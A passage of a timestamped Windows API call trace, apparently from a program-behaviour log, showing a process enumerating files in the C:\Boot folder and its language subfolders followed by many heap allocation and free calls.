ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727f08 [0157.103] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.103] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9abff9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef597530, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x169a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0157.103] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0157.103] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*", lpFindFileData=0x34ff584 | out: lpFindFileData=0x34ff584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x728248 [0157.104] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff584 | out: lpFindFileData=0x34ff584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0157.104] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff584 | out: lpFindFileData=0x34ff584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0157.104] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff584 | out: lpFindFileData=0x34ff584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 0 [0157.104] FindClose (in: hFindFile=0x728248 | out: hFindFile=0x728248) returned 1 [0157.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0157.104] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0157.104] FindClose (in: hFindFile=0x727f08 | out: hFindFile=0x727f08) returned 1 [0157.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.104] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0157.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0157.104] FindFirstFileW (in: lpFileName="C:\\Boot\\ro-RO\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728248 [0157.105] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.105] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0157.105] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0157.105] FindClose (in: hFindFile=0x728248 | out: hFindFile=0x728248) returned 1 [0157.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.105] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0157.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0157.106] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727e88 [0157.107] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0157.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0157.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0157.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0157.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0157.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0157.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0157.451] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703a60, Size=0x4000) returned 0x4554ff0 [0157.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe8 | out: hHeap=0x6a0000) returned 1 [0157.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4569fa0 | out: hHeap=0x6a0000) returned 1 [0157.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4559f98 | out: hHeap=0x6a0000) returned 1 [0157.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.583] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4554ff0, Size=0x8000) returned 0x4559f98 [0157.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe8 | out: hHeap=0x6a0000) returned 1 [0157.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0157.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4561fa0 | out: hHeap=0x6a0000) returned 1 [0157.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4561fa0 | out: hHeap=0x6a0000) returned 1 [0157.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0157.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4561fa0 | out: hHeap=0x6a0000) returned 1 [0157.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458dfb8 | out: hHeap=0x6a0000) returned 1 [0157.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0157.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0158.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0158.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0158.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0158.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0158.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0158.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0158.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0158.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0158.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.009] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4559f98, Size=0x4000) returned 0x4591fc0 [0158.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.014] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4591fc0, Size=0x8000) returned 0x4591fc0 [0158.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0158.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0158.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0158.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0158.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0158.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0158.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0158.456] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4591fc0, Size=0x8000) returned 0x456b7b0 [0158.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0159.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0159.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0159.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0159.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0159.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0159.645] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456b7b0, Size=0x4000) returned 0x456b7b0 [0159.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0159.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 